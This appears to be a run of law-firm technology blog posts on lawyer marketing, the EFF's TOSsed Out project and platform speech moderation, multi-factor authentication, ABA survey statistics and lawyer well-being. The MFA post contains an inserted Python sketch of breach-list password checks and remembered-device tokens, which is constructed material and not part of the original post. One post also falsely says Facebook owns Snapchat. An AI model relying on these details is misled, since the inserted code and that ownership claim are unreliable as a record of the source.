Other popular social media posts involve eye-catching photos or headlines, happenings around our office (employee promotion, decorating contests, etc.), and funny technology themed comics. We also see greater reach and engagement numbers when our employees (particularly, our President) share posts from our company page to their personal pages. This is extremely helpful especially if you have an employee with a large number of followers – the more eyes on posts, the better!

Sensei also produces blog posts, podcasts, and articles (like this one) that aid in our marketing efforts. These help in getting our name out there and often lead to contacts from the media or prospective clients. We push these out on social media as well and tag and link to whomever we can. People are very grateful to see themselves tagged, linked to, etc. As you can see, everything we do goes on social media.

While we have experienced positive returns on most of our efforts, not everything is a success. We are constantly tracking and experimenting with changing features or new ideas. Something may work for a while and then suddenly not work, so we have to stay alert and be ready to switch directions if needed. Luckily, we have a great marketing team that keeps the ship on course!

A Word of Warning & Conclusion

We would be remiss not to warn lawyers of the possible perils of a large digital footprint. The more information you put out on the internet, the more susceptible you are to cybercriminals doing their best to steal your data (among other things). In this case, make sure you use well-reviewed, secure apps, don’t overshare on social media, and give out only work contact information. Be sure to take steps to keep yourself, your firm, and your clients safe online.

In conclusion, the basic principles of marketing have not changed much over the years but the mediums have evolved at dizzying rates. Do your best to keep up with the changes, educate yourself, come up with creative ways to stand out, stay safe, and be authentic! There is a pot of gold at the end of the marketing rainbow!

Electronic Frontier Foundation Takes on Online Speech Moderation With TOSsed Out


The Electronic Frontier Foundation (EFF) announced on May 20th that it had launched TOSsed Out, a new iteration of EFF’s continuing work in tracking and documenting the ways that Terms of Service (TOS) and other speech moderating rules are unevenly applied to people by online services. Sometimes, posts are deleted. Sometimes accounts are banned. For many people, the internet represents an irreplaceable forum to express their ideas, communicate with others, etc.

We have long been fans of the EFF and were delighted to hear that cybersecurity guru Bruce Schneier is leaving IBM, in part to focus on teaching cybersecurity to the next generation but in part to focus on his role as a public interest cybersecurity specialist. Since he is already on the board of the EFF, he is in a great position to be of help.

But back to TOSsed Out, which follows in the path of Onlinecensorship.org, which EFF launched in 2014 to collect reports from users in an effort to encourage social media companies to operate with greater transparency and accountability as they regulate speech. TOSsed Out will focus on the ways that people are negatively affected by these rules and their erratic enforcement.

Commercial content moderation practices negatively affect lots of folks, especially people who are marginalized. This ranges from black women who share their experiences of racism to sex educators whose content is deemed too explicit. TOSsed Out’s mission is to show that trying to censor social media ends up removing legal, protected speech.

You can find the TOSsed Out website at https://www.eff.org/tossedout. It provides some examples of online content moderation gone astray – with future examples to be added. The EFF is attempting to make clear the need for companies to embrace the Santa Clara Principles, which it created to establish a human rights framework for online speech moderation, require transparency about content removal, and specify appeals processes to help users get their content back online. Those are all good objectives and we support the Principles. As of June 2019, three of the largest internet platforms—YouTube, Facebook, and Twitter—began to implement the recommendations outlined in the Principles.

There has, however, been a movement to apply the First Amendment to private companies in spite of the fact that it applies only to governmental restrictions on speech. Of course, it makes perfect sense that Facebook pages and Twitter accounts, which are made public forums by politicians, are subject to the First Amendment. By way of example, see Knight First Amendment Institute v. Trump, in which the court ruled that the President could not block followers who expressed opposing points of view – note that the case is on appeal and was argued on March 26, 2019 in the U.S. Court of Appeals for the 2nd Circuit.

It is true that we now live in a world where private social media entities can limit, control and censor speech as much or more than governmental entities. There has been a growing number of people advocating that the First Amendment should be extended to cover these entities.

The new thesis is that when a private actor has control over online communications and online forums, that private actor is analogous to a governmental actor. The notion is that the U.S. Supreme Court should relax the state action doctrine and interpret the First Amendment to limit the “unreasonably restrictive and oppressive conduct” of private entities, such as social media companies, that censor freedom of expression.

Some conservatives believe that the majority of tech entrepreneurs are liberal. They ask: Do their algorithms, which search for and remove objectionable content, contain biases?

But extending the First Amendment to private businesses is controversial and does not seem to be a majority position. These businesses have discretion over the content they wish to promote or forbid.

In any event, one hurdle to applying the First Amendment to social media companies, mentioned above, is the state action doctrine, a key concept in constitutional law. This was examined in the April 2019 ABA Journal, which noted the U.S. Supreme Court explained in the Civil Rights Cases (1883) that the 14th Amendment limits “state action” and not “individual invasion of individual rights.” Translated, this means that the Constitution and the Bill of Rights limit the actions of governmental actors, not private actors.

Just last year, a federal district court in Texas affirmed that traditional view, ruling in Nyabwa v. Facebook that a private individual could not maintain a free speech lawsuit against Facebook, stating that “the First Amendment governs only governmental limitations on speech.”

Most legal experts view it as unlikely that social media platforms will be held to First Amendment constraints, believing that no court could see these platforms as being fully state actors subject to the First Amendment.

Most social media platforms forbid hate speech that offends or attacks people on the basis of race, ethnicity, national origin, religion, gender, sexual orientation, disability, disease or other traits. Social media companies are very cognizant of the controversy surrounding their policies. Let’s look at Facebook, the big kahuna of social media. Facebook is certainly trying, especially recently, to establish a balance between freedom of speech and unacceptable speech.

On its community standards page (https://www.facebook.com/communitystandards/), Facebook acknowledges that striking a balance is an ever-evolving effort.

Twitter has a Hateful Content Policy which may be found at https://help.twitter.com/en/rules-and-policies/hateful-conduct-policy. Its general guidelines and policies may be found at https://help.twitter.com/en/rules-and-policies#general-policies.

Legally speaking, social media companies are not compelled to do anything about hate speech. 72% of respondents to a June 2018 Pew Research Center survey believe that social media platforms actively censor political views that those companies find objectionable (https://www.pewinternet.org/2018/06/28/public-attitudes-toward-technology-companies/).

There is increasing pressure on social media to stamp out hate speech. A lot of that pressure comes from advertisers who do not want to be affiliated with a platform that allows it.

Facebook (which owns Instagram, SnapChat and WhatsApp), Twitter and YouTube have hired thousands of new moderators to filter out content in violation of their standards. Moderators are inconsistent. There are Facebook users whose posts on racial issues were deleted by Facebook but white friends, when posting the same posts, did not have their posts deleted.

The Silicon Valley mindset is that every problem can be solved by algorithms – the current thinking is that the solution is at hand but they just haven’t gotten it quite right yet.

Social media and other providers are now thinking about the broader social impact of their platforms and the possibility that they might be regulated if they don’t act.

For those interested in this subject, on March 27, 2019, the Congressional Research Service released a report entitled Free Speech and the Regulation of Social Media Content (https://fas.org/sgp/crs/misc/R45650.pdf), a 43-page document which takes an extensive look at some of the issues we have raised.

Facebook and YouTube are currently in a dither about what to do with deepfake videos which are getting harder and harder to detect as the technology improves. Furthermore, on June 5, 2019, YouTube announced plans to remove thousands of videos and channels that advocate neo-Nazism, white supremacy and other bigoted ideologies in an attempt to clean up extremism and hate speech.

The new policy will ban “videos alleging that a group is superior in order to justify discrimination, segregation or exclusion,” the company said. The prohibition will also cover videos denying that violent events, like the mass shooting at Sandy Hook Elementary School in Connecticut, took place. This is sure to reignite the debate about whether the First Amendment should be extended to private companies.

People rely on internet platforms to share experiences and build communities, and not everyone has good alternatives to speak out or stay in touch when a tech company censors or bans them. Rules need to be clear, processes need to be transparent, and appeals need to be accessible.

Amen to all of that. But regulation may not be the answer and it may present its own dangers. It is currently a sea of confusion with no clear channel markers in sight.

Using Multi-Factor Authentication Blocks 99.9% of Account Takeover Attacks


It was big news in late August when Microsoft said that users who enable multi-factor authentication (MFA) for their accounts will end up blocking 99.9% of automated attacks. This doesn’t apply just to Microsoft accounts. It applies to any other account on any website or online service.

Today, virtually all service providers support multi-factor authentication, and in most cases, there is no charge. It can be something as simple as SMS-based one-time passwords or advanced biometrics solutions.

“Based on our studies, your account is more than 99.9% less likely to be compromised if you use MFA,” said Alex Weinert, Group Program Manager for Identity Security and Protection at Microsoft.

Weinert said that old advice like “never use a password that has ever been seen in a breach” or “use really long passwords” doesn’t really help.

Weinert should know – his credentials are impressive. He was one of the Microsoft engineers who worked to ban passwords that became part of public breach lists from Microsoft’s Account and Azure AD systems back in 2016. As a result of his work, Microsoft users who were using or tried to use a password that was compromised in a previous data breach were told to change their credentials. These days, many providers will not allow you to use a password that is known to have been compromised. So much for the ever-popular “123456.”

However, Weinert said that despite blocking leaked credentials or simplistic passwords, hackers continued to compromise Microsoft accounts. Why? Because today’s passwords or their complexity don’t really matter anymore. Hackers have many different methods that they use to get users’ credentials.

With over 300 million fraudulent sign-in attempts targeting Microsoft cloud services every day, Weinert says that enabling a multi-factor authentication solution blocks 99.9% of these unauthorized login attempts, even if hackers have a copy of a user’s current password. Now that’s impressive.

The 0.1% number accounts for more sophisticated attacks that use technical solutions for capturing MFA tokens, but these attacks are still extremely rare compared to the daily grinding of credential stuffing botnets. What most lawyers fail to realize is how automated these attacks have become.

Microsoft’s claim that using MFA blocks 99.9% of automated account takeover (ATO) attacks isn’t the first of its kind. In May, Google said that users who added a recovery phone number to their accounts (and thus indirectly enabled SMS-based MFA) were also improving their account security.

“Our research shows that simply adding a recovery phone number to your Google Account can block up to 100% of automated bots, 99% of bulk phishing attacks, and 66% of targeted attacks that occurred during our investigation,” Google said at the time.

We get it – lawyers perennially want convenience over security – they are loath to spend a precious few seconds enabling a second layer of security. We believe that many lawyers think they will have to employ multi-factor authentication every time they log in somewhere. Not necessarily true. In most cases, you can request that your provider remember your device (phone, laptop, etc.). It is only when someone tries to log on from an unknown device that you would, for instance, have to enter a code texted to your phone.

Think about it. If an unknown device is trying to access one of your accounts, you want very much to know about that and have a method of stopping it. That’s what MFA gives you – peace of mind.

And consider this: When both Google and Microsoft are recommending the same thing, it’s probably a good time to start following their advice.
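As an added illustration (not code from the original post, from Microsoft or from Google), here is a small Python sketch of the two mechanisms this article describes: refusing a new password that appears in a breach list, and a remembered-device token so that the second factor is only demanded from an unknown device. The breach list, the server key, the token format and the 30-day trust window are all constructed assumptions for the example.

```python
import hashlib
import hmac
import secrets

# Constructed breach list: SHA-1 digests of passwords known to be compromised.
# A real provider checks against a large breach corpus; embedding a handful of
# entries keeps the example runnable offline.
KNOWN_BREACHED = {
    hashlib.sha1(p.encode()).hexdigest().upper()
    for p in ("123456", "password", "qwerty", "letmein")
}


def is_breached_password(password: str) -> bool:
    """True if the candidate password is on the breach list (compared by hash)."""
    digest = hashlib.sha1(password.encode()).hexdigest().upper()
    return digest in KNOWN_BREACHED


# Remembered-device tokens: issued after a successful second-factor check and
# stored on the device; a valid, unexpired token for the same user lets the
# provider skip the second factor on later logins from that device.
SERVER_KEY = secrets.token_bytes(32)        # per-deployment secret (constructed)
DEVICE_TRUST_SECONDS = 30 * 24 * 3600       # assumed 30-day trust window


def issue_device_token(user: str, now: float, key: bytes = SERVER_KEY) -> str:
    """Create 'user|expiry|nonce|tag', where tag is an HMAC over the first three fields."""
    exp = int(now) + DEVICE_TRUST_SECONDS
    nonce = secrets.token_hex(8)
    payload = f"{user}|{exp}|{nonce}"
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}|{tag}"


def device_is_trusted(user: str, token: str, now: float, key: bytes = SERVER_KEY) -> bool:
    """Accept the token only if its tag verifies, it names this user, and it has not expired."""
    try:
        tok_user, exp, nonce, tag = token.split("|")
        exp_ts = int(exp)
    except ValueError:
        return False                       # malformed token
    payload = f"{tok_user}|{exp}|{nonce}"
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected.encode(), tag.encode()):
        return False                       # forged or tampered token
    return tok_user == user and now < exp_ts


def login_decision(user: str, password_ok: bool, device_token, now: float,
                   key: bytes = SERVER_KEY) -> str:
    """Return 'deny', 'allow' or 'mfa_required' for a sign-in attempt.

    A stolen password alone reaches at most 'mfa_required': without a trusted
    device token, the second factor is still demanded.
    """
    if not password_ok:
        return "deny"
    if device_token and device_is_trusted(user, device_token, now, key):
        return "allow"
    return "mfa_required"


if __name__ == "__main__":
    # Constructed walk-through: a known-breached password is rejected at set time;
    # a first login from a new device needs MFA, the same device later does not.
    print("123456 breached:", is_breached_password("123456"))
    t0 = 1_700_000_000.0
    print("new device:", login_decision("alice", True, None, t0))
    tok = issue_device_token("alice", t0)
    print("remembered device:", login_decision("alice", True, tok, t0 + 3600))
    print("wrong user, same token:", login_decision("bob", True, tok, t0 + 3600))
```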

The ABA Reports on Lawyer Websites and Lawyer Marketing


We always look forward to the ABA Legal Technology Resource Center’s Annual Legal Technology Survey Report on the use of technology in the legal profession. The summary of the “Marketing and Communication” portion of the 2019 survey was recently published. It was written by our good friend Allison Shields and contains some fascinating (and worrisome) statistics.

Respondents to the 2019 Survey segment covering websites and law firm marketing were mostly solos or from smaller firms, consisting of 27% solos, 29% lawyers in firms of 2-9 lawyers, 18% from firms of 10-49 lawyers, 11% from firms of between 100-499 lawyers, 10% from firms with 500+ lawyers, and 5% from firms with 50-99 lawyers. The average age of respondents was 58 years old, with 55% of respondents identifying as 60+ years old, and another 24% between 50-59 years old. Wow, the graying of the profession is noteworthy – or do younger lawyers not participate in surveys?

The summary focuses on marketing and website trends mainly among firms with fewer than 50 lawyers. We think the survey is troubling in that it seems that many solo and small firm attorneys engage in “random acts of marketing” rather than having a cohesive marketing plan.

According to the 2019 Survey, only 47% of firms overall have a marketing budget. The largest firms are the most likely to report having such a budget (94% of those from firms of 100+ lawyers), and 61% from firms of 10-49 lawyers. However, only 31% of firms from 2-9 lawyers and 17% of solo respondents have firm marketing budgets.

From our foxhole, these stats are pretty much reflective of what we see in the real world. Solos and small firm lawyers struggle to keep their fundamental technology “semi” up-to-date. Their revenues just don’t seem to permit the luxury of having a marketing budget.

The leading channels for marketing across all firm sizes are email (41%), Facebook (30%), and direct mail (19%). Fewer than 15% of respondents overall report their firms use Avvo, Findlaw, Lawyers.com, or the Yellow Pages to market their practices; however, 25% of solos report using Avvo.

Frankly, we think Avvo may have peaked. It will be interesting to see next year’s numbers. Consistently, solo and small firm lawyers have reported aggressive marketing by Avvo which may contribute to the number of lawyers using it.

Solos most often use email (40%) for their marketing, followed by Facebook (26%) and Avvo (25%). Facebook was the most popular for lawyers from firms of 2-9 lawyers at 39%, followed by print at 33%. In firms of 10-49 lawyers, respondents reported using email most often (47%), followed by print (41%). LinkedIn was not included as one of the channels in this survey question, which we find odd. When we poll audiences, LinkedIn is frequently mentioned as a valuable marketing tool.

Only 57% of solos have a firm website, while over 90% of respondents in all other firm sizes report having a firm website. This is disturbing in a time when prospective clients are often searching online (via their computer or smartphone). Of those solos who do have a website, we think it’s a good bet that many of those websites are not optimized for mobile device display, which is all but required in today’s world.

Although most firms report they have not used video in their marketing, the numbers show an increase in the adoption of video. 26% of respondents said their firms use video as part of their marketing, and 65% have not yet adopted video marketing. Naturally, the largest firms (100+ attorneys) are most likely to use video – but then of course they have the budget for it. Only 4% of solos use video – and the quality tends to be low among smaller firms.

30% reported this year that their firm has a blog. Only 9% of solos have a blog. Our guess is only the big firms (in general) tend to have regular posts. There are many, many legal blogs where the last post was made months ago – not a good reflection on the firm. The survey reports that 56% update their blogs monthly and 18% update it weekly. 21% have stopped updating their blog completely and some have others do their blog posts for them.

80% of firms have a presence on social media. LinkedIn leads at 79%, followed by Facebook (54%), Martindale (38%), and Avvo (23%). Reported use of Facebook and Avvo has declined over the past year; in 2018, 63% of respondents reported their firms maintained a Facebook presence, and 36% maintained a presence on Avvo.

80% of respondents use social media themselves for professional purposes, including 67% of solos, 83% of lawyers in firms of 2-9 lawyers, and 86% of lawyers in firms with 10-49 lawyers. LinkedIn is the leading platform – 73% of all respondents maintain a LinkedIn presence.

Overall, only 39% of respondents who participate in social media report using Facebook (that’s a significant drop from 47% in 2018). Solos and small firm lawyers use Facebook for professional purposes more often than lawyers in larger firms; 50% of solos and 48% of lawyers in firms with 2-9 lawyers report using the platform, as compared with only 26% of lawyers in firms with 10-49 lawyers.

Just 28% of respondents report using Twitter, including 31% of lawyers from firms between 10-49 lawyers, 28% of lawyers in firms with 2-9 lawyers, and only 19% of solos reported using the platform.

“Handling” marketing still lies largely with the attorneys themselves. 59% of respondents, including 60% of solos, said attorneys perform these functions within the firm. Only 31% of firms overall have internal marketing staff, and 17% use outside consultants, while 16% report that administrative staff performs marketing functions for the firm. 13% of respondents say “no one” is responsible for marketing in their firms, including 30% of solos and 13% of respondents in firms of 2-9 lawyers.

Only 7% of all respondents indicated that their firms were using AdWords (that certainly proved to be pouring money down a rathole for us). Overall, 59% of respondents report that their firms do not use a consultant for SEO, AdWords/PPC (Pay Per Click), or social media.

Why do lawyers blog and use social media? Pretty much the same answers – 67% said they did these things for career development and networking and 49% said for client development. Thirty-eight percent of respondents say they have access to analytics or reports to monitor the effectiveness of their website or blog. 41% do not have such access and 21% do not know. Our own experience with clients is that very few monitor the SEO effectiveness of their blog or website, especially at the solo/small firm level.

Of those respondents who report maintaining a legal topic blog, 49% have gotten clients as a result of blogging and another 34% do not know whether they have gotten a client or not. Of those who used social media for professional purposes this year, 31% report having gotten clients as a result, 44% say they did not, and 24% did not know. Solos (35%) and lawyers from firms of 2-9 lawyers (34%) were the most likely to report having gotten clients through social media, followed by lawyers from firms of 10-49 lawyers (28%) and firms of 100+ lawyers (29%). Only 3% of Twitter users reported getting clients from their use of Twitter.

Overall, across all firm sizes, on a scale of 1 (not at all confident) to 5 (very confident), respondents placed their level of confidence in their firm’s marketing efforts at 2.9. We would have said that the confidence level is lower than that!

It amazes us how many people leave marketing to others. We suppose time constraints are one huge reason. The outsourced efforts often seem to falter without attorneys closely managing them – which of course defeats part of the purpose of outsourcing. And firms are just terrible at tracking the return on their investment of both time and money.

In a highly competitive marketplace, solos and small firms have a long way to go, a fact underscored in the survey. We recommend that law firms schedule regular marketing meetings and develop a cohesive plan – and then follow it. We flounder ourselves now and again when the workload is overwhelming, so we understand how hard it is to keep one’s nose to the ground – but organized marketing always pays off!

The Intersection of Ethics and Well-Being


ABA RESOLUTION 105

The ABA House of Delegates adopted Resolution 105 at the 2018 ABA Midyear Meeting. The resolution supports the goal of reducing mental health and substance use disorders and improving the well-being of lawyers, judges and law students. It urges stakeholders within the legal profession to consider the recommendations set out in The Path to Lawyer Well-Being: Practical Recommendations for Positive Change. The pursuit of lawyer wellness has spread rapidly through law firms, bar associations, state bars and state supreme courts.

The National Task Force on Lawyer Well-Being, assembled in August 2016 to “create a movement toward improving the health and well-being of the legal profession,” defines lawyer well-being as a “continuous process whereby lawyers seek to thrive in each of the following areas: emotional health, occupational pursuits, creative or intellectual endeavors, sense of spirituality or greater purpose in life, physical health, and social connections.”

The Task Force’s recommendations in their report entitled The Path to Lawyer Well-Being: Practical Recommendations for Positive Change, published in August 2017, focus on five central themes:

(1) identifying stakeholders and the role each of us can play in reducing the level of toxicity in our profession,

(2) eliminating the stigma associated with help-seeking behaviors,

(3) emphasizing that well-being is an indispensable part of a lawyer’s duty of competence,

(4) educating lawyers, judges, and law students on lawyer well-being issues, and

(5) taking small, incremental steps to change how law is practiced and how lawyers are regulated to instill greater well-being in the profession.

The authors have monitored many of these developments – and now teach several CLEs related to lawyer wellness. We applaud the actions taken to date – and there is still so much to be done. We decided to write an article that highlights some of the developments since Resolution 105 was adopted, including several sad stories that have shaken the legal profession.

THE DEATH OF PAUL RAWLINSON

On April 16, 2019, The ABA Journal carried a story about the death of Baker McKenzie’s global chairman Paul Rawlinson. He had died four days earlier, six months after he took a temporary leave to deal with health issues caused by exhaustion. He was 56 years old at the time of his death.

When he took the leave, his firm was struggling with an inquiry into the firm’s handling of sexual harassment complaints and internal disagreement over associate pay. The firm at that time had 78 offices and nearly 5,000 attorneys. Reportedly, Rawlinson had visited more than half of those offices.

The exact cause of death was not released, but his death spurred the growing concern about lawyer wellness and the systematic pressures placed on many lawyers, especially at large law firms – and most especially those who lead those firms.

We do not suggest that Rawlinson’s wellness issues resulted in unethical behavior of any kind. It was simply a crushing and disturbing story, suggesting that a lawyer’s exhaustion could lead to their death. One thing we wondered – and still wonder – was whether there was a culture of wellness at Baker McKenzie and whether his colleagues had reason to suspect how unwell he really was. Have we, as a profession, become impervious to the symptoms of extreme stress on our colleagues?

THE SUICIDE OF GABE MACCONAILL

Attorney Gabe MacConaill, a 42-year-old partner at Sidley Austin, committed suicide on October 14, 2018. His widow, Joanna Litt, wrote an open letter saying that “Big Law killed my husband.”

In this case, there were signals – episodic binge drinking, the departure of several close friends at the firm which created more pressure on him, a new position chairing the summer associate program, and then a huge bankruptcy case.

He became visibly stressed, anxious and wasn’t sleeping. When his wife called his closest colleague, she said he was working more and more with his door closed – and that his sense of humor had been gone for a while.

He told his wife that he felt like a phony who had fooled others about his abilities as a lawyer and he thought he would be fired at the end of the bankruptcy case. He worked himself to exhaustion, going to an ER with cardiac symptoms, but when early indications were that his health problems might be due to dehydration, he left the hospital without seeing a doctor so he could return to work.

His wife arranged a mobile IV to come to their home and give him fluids. He then flew to Delaware to file the bankruptcy case.

Here, ethics entered the situation because, as his wife found out later, he had stopped responding to work emails when he returned home to LA. Every lawyer reading that sentence knows how close someone must be to the edge of the precipice when they stop responding to work emails in the midst of a high value case.

On the last morning of his life, he kissed his wife goodbye, took his gun with him, and shot himself in the head in the garage of the firm’s high-rise office building.

His wife said that he set impossibly high standards for himself, that he was a “maladaptive perfectionist” who lacked self-compassion. He said he couldn’t “turn off his head.”

She said, “He had a deep, hereditary mental health disorder and lacked essential coping mechanisms. But these influences, coupled with a high-pressure job and a culture where it’s shameful to ask for help, shameful to be vulnerable and shameful not to be perfect, created a perfect storm.”

Remember that these are the words of a grieving widow. The description of the law firm is certainly accusatory and we cannot know how much is an accurate depiction.

Sidley Austin told the press that the firm handled the situation well, and that it was MacConaill’s responsibility to come forward and ask for help when he was overwhelmed. The firm has a wellness program, but an anonymous source at the firm told the Financial Times that folks at Sidley aren’t comfortable using it. The source said “There is not a culture or feeling of safety right now in that set of offices. You can have resources in place, but unless you have the right culture, people aren’t going to feel safe using them or approaching someone to ask for help.”

That assessment, if true, certainly cries out for remediation.

THE STRESS OF PRACTICING LAW TODAY

Clearly, the personal stories above had a profound impact on the authors. Author Nelson, a former president of the Virginia State Bar, worked on the VSB’s Special Committee on Lawyer Well-Being, chaired by then VSB President Len Heath, and was one of the many authors who worked on its May 2019 report, “The Occupational Risks of the Practice of Law.” For anyone who works on such endeavors, what one learns often comes as something of a revelation.

The demands of being a lawyer can often hide substance or mental health issues and the high-achieving people who become lawyers often do not avail themselves of available resources to help them. There is a stigma attached to asking for help and a fear that one will seem “weak” or perhaps not worthy of rising within the firm.

The authors live in Virginia but frequently lecture across the nation. We have heard a lot of sad stories. After one CLE, a lawyer in another state called to ask for help because, as he said, “I just can’t practice law anymore.” It is amazing to think how many ethical rules he must have violated, because he flatly acknowledged that he wasn’t able to adequately do his work for his clients.

In his case, he was simply distracted by everything – he had lost the ability to focus. Everything distracted him – the turbulent politics of our time, sports, online games, social media. He could no longer keep his nose to the grindstone and get his work done. He was ignoring emails, missing deadlines, failing to call clients back or respond to their email – and very much afraid of getting in disciplinary trouble. Fortunately, there are confidential resources in his state and we were able to persuade him to contact those resources.

ATTORNEY IMPAIRMENT

The ABA, in conjunction with the Hazelden Betty Ford Foundation, funded a large study dealing with attorneys and substance abuse. The Journal of Addiction Medicine published “The Prevalence of Substance Use and Other Mental Health Concerns Among American Attorneys” in 2016. The study surveyed nearly 13,000 attorneys.

Some of the findings: 20.6 percent reported problematic drinking; among attorneys age 30 or younger, the figure was 31.9 percent.

Of those who used drugs, both legal and illegal, respondents reported using stimulants the most—74.1 percent. Additionally, of those who used drugs, 51.3 percent of respondents reported using sedatives, 46.8 percent tobacco, 31 percent used marijuana and 21.6 percent used opioids.

It should be noted that this study relied on the attorneys self-reporting. Only 3,419 lawyers out of 14,895 surveyed answered questions about drug use. Peter Krill, one of the authors of the study, remarked: “It’s left to speculation what motivated 75 percent of attorneys to skip over the section on drug use as if it wasn’t there.”

The most common mental health concerns were:

  • Anxiety, 61.1 percent.
  • Depression, 45.7 percent.
  • Social anxiety, 16.1 percent.
  • Attention deficit hyperactivity disorder, 12.5 percent.
  • Panic disorder, 8 percent.
  • Bipolar disorder, 2.4 percent.

How did those with alcohol and drug problems feel about getting treatment? The main concern, and it is huge, is confidentiality. Only 6.8 percent sought treatment and of those who did, only 21.8 percent went through a program designed for legal professionals.

ETHICAL MISSTEPS MAY INDICATE A PROBLEM

In many cases, the actions an attorney takes (or perhaps inactions) can lead to professional discipline or malpractice AND indicate the presence of mental illness or a substance use disorder.

Examples? An attorney could demonstrate a pattern of conduct – missed deadlines, missed appointments, last-minute requests for continuances, frequent absenteeism, failing to return client phone calls or respond to mail, co-mingling or inappropriately taking client trust funds, or making false representations. The attorney may also demonstrate behaviors at work that appear different from their prior functioning. For example, an attorney may become socially withdrawn, procrastinate, have unpredictable and frequent mood swings, demonstrate unwarranted anger or hostility, and seek to point the finger at others for personal failings.

Any of these behaviors may be the product of depression, anxiety, neurological dysfunction, gambling addiction and/or substance use disorder.

As indicated above, anxiety and depression are the two most common mental health problems affecting attorneys.

A depressed attorney may demonstrate low motivation, an absence of energy, fatigue, and difficulty concentrating. The attorney may take a long time to learn something new or to respond to client calls or answer mail. The attorney may not respond to important emails, mail, or phone calls out of panic or fear.

The lawyer may procrastinate and leave a job unfinished for someone else to complete, come into work late, leave early, or not come into the office at all for several days. They may file motions or briefs that omit important details because the attorney could not concentrate and could not remember specific information.

Work could be completed late, or not completed, and would likely contain major mistakes. If the lawyer’s supervisor gave negative feedback, the depressed attorney may respond with anger and irritability. To this attorney, everything would sound like criticism, resulting in angry responses or blaming others for mistakes.

If the supervisor asked the lawyer to redo something or to correct a problem, the lawyer might feel overwhelmed and too stressed to manage. This attorney’s ability to tolerate stress and cope with the everyday demands of clients, partners, opposing counsel, or judges becomes severely compromised to the point where the lawyer is unable to practice competently.

WHEN MUST A LAWYER WITHDRAW OR BE REMOVED FROM CLIENT REPRESENTATION?

Rule 1.16 (a)(2) prohibits a lawyer representing or continuing to represent a client where “the lawyer’s physical or mental condition materially impairs the lawyer’s ability to represent the client.”

In Formal Opinion 03-429 (Obligations with Respect to Mentally Impaired Lawyer in the Firm), the ABA Standing Committee on Ethics and Professional Responsibility writes, “Simply stated, mental impairment does not lessen a lawyer’s obligation to provide clients with competent representation.” The opinion does provide some direction: “[W]hen considering what must be done when confronted with evidence of a lawyer’s apparent mental disorder or substance abuse, it may be helpful for partners or supervising lawyers to consult with an experienced psychiatrist, psychologist, or other appropriately trained mental health professional.”

An initial referral generally includes consultation with a state Lawyer Assistance Program (LAP), which most states now have. Many programs are run by volunteers or other attorneys who are in recovery. LAP programs differ widely in what services they can provide, so check to see what your state’s organization is able to offer. Some LAPs merely provide referrals to mental health professionals in the community, while others may have mental health professionals on staff. Most LAPs are not able to provide a fitness to practice evaluation. In those cases, a referral to a forensic psychologist will be needed.

It is very common for impaired attorneys to need a month of treatment, with continuing treatment thereafter.

These treatments often have good outcomes, with a combination of therapy and medications. This protects clients, the firm reputation and may save the lives of impaired lawyers. As we well know, the financial burden on a small firm may be significant – no hours billed and continuing to pay salary, benefits, etc. And of course, there is never a guarantee that the underlying impairment will be cured.

Sadly, sometimes a law firm must act. As the opinion says,

“If the mental impairment of a lawyer has resulted in a violation of the Model Rules, an obligation may exist to report the violation to the appropriate professional authority. If the firm removes the impaired lawyer in a matter, it may have an obligation to discuss with the client the circumstances surrounding the change of responsibility. If the impaired lawyer resigns or is removed from the firm, the firm may have disclosure obligations to clients who are considering whether to continue to use the firm or shift their relationship to the departed lawyer, but must be careful to limit any statements made to ones for which there is a factual foundation. The obligation to report a violation of the Model Rules by an impaired lawyer is not eliminated by departure of the impaired lawyer.”

PROMOTING LAWYER WELLNESS – BEGINNING TO ADDRESS THE PROBLEM

How do firms nurture lawyers and help them stay well? The answer to that is complicated, but it is refreshing to see that more and more firms are committed to finding a path that encourages lawyer wellness. Here is some of what we’ve seen:

  • Law firm physical fitness centers (greatly loved by lawyers)
  • Space for yoga or meditation
  • Non-alcohol events – or at least events where there is a choice of beverages
  • Training/education sessions/retreats about wellness, including stress reduction, meditation, self-care, team building, etc.
  • Policies which encourage employees to come forward for treatment without being afraid of losing their jobs
  • Setting a maximum for billable hours and lowering the minimum required
  • Special training for partners in creating a culture of wellness and how they can help
  • For larger firms, hiring a Director of Wellness has become common
  • To make sure lawyers are ready to come back to work and to perform competently, firms are requiring verification of participation in a treatment program, requiring that the lawyer commit to sticking with the program, and agree to alcohol and drug screens where appropriate

PROMOTING LAWYER WELLNESS – EVOLVING STEPS TO ADDRESS THE PROBLEM

We did a little research on 2019 steps taken by law firms to address lawyer wellness. While some steps echo the beginning steps above, some are innovative.

Law firms, particularly large firms, are offering CLE wellness courses, bringing in speakers and also offering online resources to help with stress or substance abuse. The resources are often available via firm intranet or through custom apps.

Firms have offered clubs ranging from knitting to running and events like “bike to work week.” Reed Smith highlighted the connection between art and wellness and established a program encouraging its employees to create and exhibit art – as well as viewing art in the firm’s offices around the world.

Firms are creating mocktails for retreats and functions – and they sound pretty appealing! New terminology and imagery are being employed. For Cooley, “cocktails and conversation” is no longer used – ditto for images of martini glasses and champagne flutes promoting events.

Unsurprisingly, there has been an emphasis on mindfulness and meditation, with firms offering training, guided meditation sessions, and subscriptions to meditation apps.

Employee assistance programs have bloomed, offering help for those with addiction problems, financial stress, relationship difficulties and other crises. Most programs are provided by a third-party vendor with interactions taking place via phone, video counseling, online chats or even face-to-face.

Some firms are bringing in counselors on a regular basis – and the sessions are confidential. This seems to be successful as appointments fill up quickly.

Knowing how helpful it can be to have symptoms of a colleague’s struggle recognized, some firms are providing mental health first aid training, making sure that staff, attorneys and managing partners know the symptoms of depression, anxiety and substance abuse.

There has been a sudden rash of hiring to fill a new position: Director of Well-Being. As you might imagine, this is more likely to happen at larger firms. As of June 2019, 11 of 40 large firms had someone exclusively working on a firm wellness program.

FINAL THOUGHTS

The National Task Force on Lawyer Well-Being concluded, in part: “To preserve the public’s trust and maintain our status as a self-regulating profession, we must truly become “our brothers’ and sisters’ keepers,” through a strong commitment to caring for the well-being of one another, as well as ourselves.”

As of August 2019, Bloomberg Law reported that 29 states have established working groups or task forces, and revised regulations related to continuing legal education (CLE) programming and to bar admissions. Virginia modified Rule 1.1 to add a comment specifically addressing lawyer well-being:

“[7] A lawyer’s mental, emotional, and physical well-being impacts the lawyer’s ability to represent clients and to make responsible choices in the practice of law. Maintaining the mental, emotional, and physical ability necessary for the representation of a client is an important aspect of maintaining competence to practice law.”

